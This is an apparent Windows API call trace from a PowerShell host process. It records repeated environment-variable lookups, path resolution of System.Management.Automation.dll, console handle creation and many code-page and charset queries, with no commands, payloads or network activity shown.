	[0042.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d56d8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.837] GetLastError () returned 0xcb
	[0043.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d56d8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0043.024] GetLastError () returned 0xcb
	[0043.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d56d8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0043.031] GetLastError () returned 0xcb
	[0043.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d56d8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0043.087] GetLastError () returned 0xcb
	[0043.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d56d8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0043.096] GetLastError () returned 0xcb
	[0043.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d56d8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0043.098] GetLastError () returned 0xcb
	[0043.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d56d8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0043.116] GetLastError () returned 0xcb
	[0043.161] VirtualQuery (in: lpAddress=0x573ddcc, lpBuffer=0x573edcc, dwLength=0x1c | out: lpBuffer=0x573edcc*(BaseAddress=0x573d000, AllocationBase=0x4db0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0043.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d56d8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0043.212] GetLastError () returned 0xcb
	[0043.328] VirtualQuery (in: lpAddress=0x573ddcc, lpBuffer=0x573edcc, dwLength=0x1c | out: lpBuffer=0x573edcc*(BaseAddress=0x573d000, AllocationBase=0x4db0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0043.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573e400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0043.331] GetLastError () returned 0xcb
	[0043.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573e3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0043.331] GetLastError () returned 0xcb
	[0043.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573e3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0043.331] GetLastError () returned 0xcb
	[0043.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573e3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0043.331] GetLastError () returned 0xcb
	[0043.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573e400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0043.358] GetLastError () returned 0xcb
	[0043.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573e3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0043.358] GetLastError () returned 0xcb
	[0043.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573e3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0043.358] GetLastError () returned 0xcb
	[0043.420] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0043.421] GetLastError () returned 0xcb
	[0043.421] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x573e910 | out: lpConsoleScreenBufferInfo=0x573e910) returned 1
	[0043.421] GetLastError () returned 0xcb
	[0043.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d56d8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0043.433] GetLastError () returned 0xcb
	[0043.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0043.438] GetLastError () returned 0xcb
	[0043.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0043.438] GetLastError () returned 0xcb
	[0043.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0043.438] GetLastError () returned 0xcb
	[0043.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d56d8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0043.512] GetLastError () returned 0xcb
	[0043.564] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0043.565] GetLastError () returned 0xcb
	[0043.565] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x573f024 | out: lpConsoleScreenBufferInfo=0x573f024) returned 1
	[0043.565] GetLastError () returned 0xcb
	[0043.567] GetConsoleOutputCP () returned 0x1b5
	[0043.569] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.569] GetLastError () returned 0xcb
	[0043.570] GetConsoleOutputCP () returned 0x1b5
	[0043.570] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.570] GetLastError () returned 0xcb
	[0043.570] GetConsoleOutputCP () returned 0x1b5
	[0043.570] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.570] GetLastError () returned 0xcb
	[0043.570] GetConsoleOutputCP () returned 0x1b5
	[0043.570] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.570] GetLastError () returned 0xcb
	[0043.570] GetConsoleOutputCP () returned 0x1b5
	[0043.570] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.571] GetLastError () returned 0xcb
	[0043.571] GetConsoleOutputCP () returned 0x1b5
	[0043.571] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.571] GetLastError () returned 0xcb
	[0043.571] GetConsoleOutputCP () returned 0x1b5
	[0043.571] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.571] GetLastError () returned 0xcb
	[0043.571] GetConsoleOutputCP () returned 0x1b5
	[0043.571] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.571] GetLastError () returned 0xcb
	[0043.571] GetConsoleOutputCP () returned 0x1b5
	[0043.571] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.571] GetLastError () returned 0xcb
	[0043.571] GetConsoleOutputCP () returned 0x1b5
	[0043.572] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.572] GetLastError () returned 0xcb
	[0043.572] GetConsoleOutputCP () returned 0x1b5
	[0043.572] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.572] GetLastError () returned 0xcb
	[0043.572] GetConsoleOutputCP () returned 0x1b5
	[0043.572] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.572] GetLastError () returned 0xcb
	[0043.572] GetConsoleOutputCP () returned 0x1b5
	[0043.572] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.572] GetLastError () returned 0xcb
	[0043.572] GetConsoleOutputCP () returned 0x1b5
	[0043.572] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.572] GetLastError () returned 0xcb
	[0043.572] GetConsoleOutputCP () returned 0x1b5
	[0043.573] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.573] GetLastError () returned 0xcb
	[0043.573] GetConsoleOutputCP () returned 0x1b5
	[0043.573] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.573] GetLastError () returned 0xcb
	[0043.573] GetConsoleOutputCP () returned 0x1b5
	[0043.573] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.573] GetLastError () returned 0xcb
	[0043.573] GetConsoleOutputCP () returned 0x1b5
	[0043.573] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.573] GetLastError () returned 0xcb
	[0043.573] GetConsoleOutputCP () returned 0x1b5
	[0043.573] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.573] GetLastError () returned 0xcb
	[0043.573] GetConsoleOutputCP () returned 0x1b5
	[0043.574] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.574] GetLastError () returned 0xcb
	[0043.574] GetConsoleOutputCP () returned 0x1b5
	[0043.574] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.574] GetLastError () returned 0xcb
	[0043.574] GetConsoleOutputCP () returned 0x1b5
	[0043.574] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.574] GetLastError () returned 0xcb
	[0043.574] GetConsoleOutputCP () returned 0x1b5
	[0043.574] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.574] GetLastError () returned 0xcb
	[0043.574] GetConsoleOutputCP () returned 0x1b5
	[0043.574] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.574] GetLastError () returned 0xcb
	[0043.574] GetConsoleOutputCP () returned 0x1b5
	[0043.575] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.575] GetLastError () returned 0xcb
	[0043.575] GetConsoleOutputCP () returned 0x1b5
	[0043.575] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.575] GetLastError () returned 0xcb
	[0043.575] GetConsoleOutputCP () returned 0x1b5
	[0043.575] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.575] GetLastError () returned 0xcb
	[0043.575] GetConsoleOutputCP () returned 0x1b5
	[0043.575] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.575] GetLastError () returned 0xcb
	[0043.575] GetConsoleOutputCP () returned 0x1b5
	[0043.575] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.575] GetLastError () returned 0xcb
	[0043.575] GetConsoleOutputCP () returned 0x1b5
	[0043.576] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.576] GetLastError () returned 0xcb
	[0043.576] GetConsoleOutputCP () returned 0x1b5
	[0043.576] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.576] GetLastError () returned 0xcb
	[0043.576] GetConsoleOutputCP () returned 0x1b5
	[0043.576] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.576] GetLastError () returned 0xcb
	[0043.576] GetConsoleOutputCP () returned 0x1b5
	[0043.576] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.576] GetLastError () returned 0xcb
	[0043.576] GetConsoleOutputCP () returned 0x1b5
	[0043.576] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.576] GetLastError () returned 0xcb
	[0043.576] GetConsoleOutputCP () returned 0x1b5
	[0043.576] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.576] GetLastError () returned 0xcb
	[0043.577] GetConsoleOutputCP () returned 0x1b5
	[0043.577] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.577] GetLastError () returned 0xcb
	[0043.577] GetConsoleOutputCP () returned 0x1b5
	[0043.577] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.577] GetLastError () returned 0xcb
	[0043.577] GetConsoleOutputCP () returned 0x1b5
	[0043.577] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.577] GetLastError () returned 0xcb
	[0043.577] GetConsoleOutputCP () returned 0x1b5
	[0043.577] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.577] GetLastError () returned 0xcb
	[0043.577] GetConsoleOutputCP () returned 0x1b5
	[0043.577] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.577] GetLastError () returned 0xcb
	[0043.577] GetConsoleOutputCP () returned 0x1b5
	[0043.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.578] GetLastError () returned 0xcb
	[0043.578] GetConsoleOutputCP () returned 0x1b5
	[0043.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.578] GetLastError () returned 0xcb
	[0043.578] GetConsoleOutputCP () returned 0x1b5
	[0043.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.578] GetLastError () returned 0xcb
	[0043.578] GetConsoleOutputCP () returned 0x1b5
	[0043.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.578] GetLastError () returned 0xcb
	[0043.578] GetConsoleOutputCP () returned 0x1b5
	[0043.578] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.578] GetLastError () returned 0xcb
	[0043.578] GetConsoleOutputCP () returned 0x1b5
	[0043.579] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.579] GetLastError () returned 0xcb
	[0043.579] GetConsoleOutputCP () returned 0x1b5
	[0043.579] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.579] GetLastError () returned 0xcb
	[0043.579] GetConsoleOutputCP () returned 0x1b5
	[0043.579] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.579] GetLastError () returned 0xcb
	[0043.579] GetConsoleOutputCP () returned 0x1b5
	[0043.579] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.579] GetLastError () returned 0xcb
	[0043.579] GetConsoleOutputCP () returned 0x1b5
	[0043.579] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.579] GetLastError () returned 0xcb
	[0043.579] GetConsoleOutputCP () returned 0x1b5
	[0043.580] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.580] GetLastError () returned 0xcb
	[0043.580] GetConsoleOutputCP () returned 0x1b5
	[0043.580] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.580] GetLastError () returned 0xcb
	[0043.580] GetConsoleOutputCP () returned 0x1b5
	[0043.580] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.580] GetLastError () returned 0xcb
	[0043.580] GetConsoleOutputCP () returned 0x1b5
	[0043.580] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.580] GetLastError () returned 0xcb
	[0043.580] GetConsoleOutputCP () returned 0x1b5
	[0043.580] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.580] GetLastError () returned 0xcb
	[0043.580] GetConsoleOutputCP () returned 0x1b5
	[0043.581] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.581] GetLastError () returned 0xcb
	[0043.581] GetConsoleOutputCP () returned 0x1b5
	[0043.581] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.581] GetLastError () returned 0xcb
	[0043.581] GetConsoleOutputCP () returned 0x1b5
	[0043.581] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.581] GetLastError () returned 0xcb
	[0043.581] GetConsoleOutputCP () returned 0x1b5
	[0043.581] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.581] GetLastError () returned 0xcb
	[0043.581] GetConsoleOutputCP () returned 0x1b5
	[0043.581] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.581] GetLastError () returned 0xcb
	[0043.581] GetConsoleOutputCP () returned 0x1b5
	[0043.581] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.582] GetLastError () returned 0xcb
	[0043.582] GetConsoleOutputCP () returned 0x1b5
	[0043.582] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.582] GetLastError () returned 0xcb
	[0043.582] GetConsoleOutputCP () returned 0x1b5
	[0043.582] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.582] GetLastError () returned 0xcb
	[0043.582] GetConsoleOutputCP () returned 0x1b5
	[0043.582] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.582] GetLastError () returned 0xcb
	[0043.582] GetConsoleOutputCP () returned 0x1b5
	[0043.582] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.582] GetLastError () returned 0xcb
	[0043.582] GetConsoleOutputCP () returned 0x1b5
	[0043.582] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.582] GetLastError () returned 0xcb
	[0043.583] GetConsoleOutputCP () returned 0x1b5
	[0043.583] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.583] GetLastError () returned 0xcb
	[0043.583] GetConsoleOutputCP () returned 0x1b5
	[0043.583] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.583] GetLastError () returned 0xcb
	[0043.583] GetConsoleOutputCP () returned 0x1b5
	[0043.583] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.583] GetLastError () returned 0xcb
	[0043.583] GetConsoleOutputCP () returned 0x1b5
	[0043.583] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.583] GetLastError () returned 0xcb
	[0043.583] GetConsoleOutputCP () returned 0x1b5
	[0043.583] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.583] GetLastError () returned 0xcb
	[0043.583] GetConsoleOutputCP () returned 0x1b5
	[0043.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.584] GetLastError () returned 0xcb
	[0043.584] GetConsoleOutputCP () returned 0x1b5
	[0043.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.584] GetLastError () returned 0xcb
	[0043.584] GetConsoleOutputCP () returned 0x1b5
	[0043.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.584] GetLastError () returned 0xcb
	[0043.584] GetConsoleOutputCP () returned 0x1b5
	[0043.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.584] GetLastError () returned 0xcb
	[0043.584] GetConsoleOutputCP () returned 0x1b5
	[0043.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.584] GetLastError () returned 0xcb
	[0043.584] GetConsoleOutputCP () returned 0x1b5
	[0043.585] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.585] GetLastError () returned 0xcb
	[0043.585] GetConsoleOutputCP () returned 0x1b5
	[0043.585] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.585] GetLastError () returned 0xcb
	[0043.585] GetConsoleOutputCP () returned 0x1b5
	[0043.585] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.585] GetLastError () returned 0xcb
	[0043.585] GetConsoleOutputCP () returned 0x1b5
